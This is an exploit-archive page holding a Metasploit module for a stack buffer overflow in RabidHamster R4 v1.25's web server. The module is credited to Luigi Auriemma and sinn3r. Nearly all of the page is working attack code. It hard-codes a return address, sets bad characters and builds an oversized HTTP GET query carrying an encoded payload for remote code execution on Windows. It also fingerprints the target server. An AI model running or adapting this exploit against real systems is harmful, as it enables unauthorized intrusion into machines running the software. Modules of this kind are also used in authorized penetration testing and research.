RabidHamster R4 Log Entry sprintf() Buffer Overflow



EKU-ID: 2188 CVE: OSVDB-ID: 79007
Author: sinn3r Published: 2012-05-28 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking

 include Msf::Exploit::Remote::HttpClient

 def initialize(info={})
  super(update_info(info,
   'Name'           => "RabidHamster R4 Log Entry sprintf() Buffer Overflow",
   'Description'    => %q{
     This module exploits a vulnerability found in RabidHamster R4's web server.
    By supplying a malformed HTTP request, it is possible to trigger a stack-based
    buffer overflow when generating a log, which may result in arbitrary code
    execution under the context of the user.
   },
   'License'        => MSF_LICENSE,
   'Author'         =>
    [
     'Luigi Auriemma',  #Discovery, PoC
     'sinn3r'           #Metasploit
    ],
   'References'     =>
    [
     ['OSVDB', '79007'],
     ['URL', 'http://aluigi.altervista.org/adv/r4_1-adv.txt'],
     ['URL', 'http://secunia.com/advisories/47901/']
    ],
   'Payload'        =>
    {
     'StackAdjustment' => -3500,
     'BadChars' => "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x20"
    },
   'DefaultOptions'  =>
    {
     'ExitFunction' => "process"
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     ['R4 v1.25', {'Ret'=>0x73790533}]  #JMP ESI (ddraw.dll)
    ],
   'Privileged'     => false,
   'DisclosureDate' => "Feb 09 2012",
   'DefaultTarget'  => 0))

   register_options(
    [
     OptPort.new('RPORT', [true, 'The remote port', 8888])
    ], self.class)
 end

 def check
  res = send_request_cgi({
   'method' => 'GET',
   'uri'    => '/'
  })

  if res and res.headers['Server'] == 'R4 Embedded Server'
   return Exploit::CheckCode::Detected
  else
   return Exploit::CheckCoded::Safe
  end
 end

 def exploit
  buf = ''
  buf << payload.encoded
  buf << rand_text_alpha(2022-buf.length, payload_badchars)
  buf << [target.ret].pack("V*")
  buf << pattern_create(200)
  buf << rand_text_alpha(3000-buf.length, payload_badchars)

  send_request_cgi({
   'method' => 'GET',
   'uri'    => "/?#{buf}"
  })
 end
end